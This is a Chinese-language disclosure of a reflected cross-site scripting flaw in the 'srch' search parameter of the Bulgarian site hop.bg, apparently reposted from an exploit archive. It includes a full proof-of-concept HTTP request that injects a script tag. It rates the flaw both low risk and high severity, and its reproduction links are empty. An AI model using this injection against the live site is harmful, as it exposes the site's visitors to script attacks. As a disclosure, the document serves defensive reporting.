漏洞标题:hop.bg | web app | 反射型跨站脚本攻击
发布日期:2025.11.07
提交者:nu11secur1ty
风险等级:低
本地利用:否
远程利用:是
CVE:N/A
CWE:N/A
基本信息
- 标题:hop.bg | web app | 反射型跨站脚本攻击
- 作者:nu11secur1ty
- 日期:2025年11月3日
- 厂商:https://hop.bg/
- 软件:https://hop.bg/
- 参考:https://portswigger.net/web-security/cross-site-scripting
漏洞描述
srch请求参数的值被复制到用单引号封装的JavaScript字符串中。攻击者向srch参数提交了载荷lifmu</script><script>alert(1)</script>nkt8b,该输入在应用程序响应中原样回显且未经过滤。该网站所有者未对已报告的问题作出响应。
此概念验证攻击表明可以向应用程序响应中注入任意JavaScript代码。
状态:高危漏洞
攻击载荷
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
GET /bg/tyrsene-123?p=123&l=1&srch=gq7ns%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3ein737&submit_search= HTTP/1.1
Host: hop.bg
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Public=3l4neblt0r1q8tl8r1j8vm1kg2; l=1; _gcl_au=1.1.1810943222.1761893757; _fbp=fb.1.1761893757009.110679894202803572; _tt_enable_cookie=1; _ttp=01K8WGTCHG0MT2MTV43EPDVPSH_.tt.1; _uetsid=a6fe2700b62611f0ba2e15757049e30e; _uetvid=a6fe6880b62611f0a84c27f8eba50d96; ttcsid=1761893757500::mkwLVMcL6Tixw1dD6Twz.1.1761893767648.0; ttcsid_D0S5A7RC77U1EAH3MNBG=1761893757499::8I3zM_RSsJeOcW0e8fgM.1.1761893767648.0
Upgrade-Insecure-Requests: 1
Referer: https://hop.bg/
|
漏洞利用
复现步骤
href
演示PoC
href
时间花费
01:27:00
系统管理员 - 基础设施工程师
渗透测试工程师
漏洞开发人员:https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ 和 https://www.exploit-db.com/
个人主页:https://www.nu11secur1ty.com/ 和 https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty https://nu11secur1ty.blogspot.com/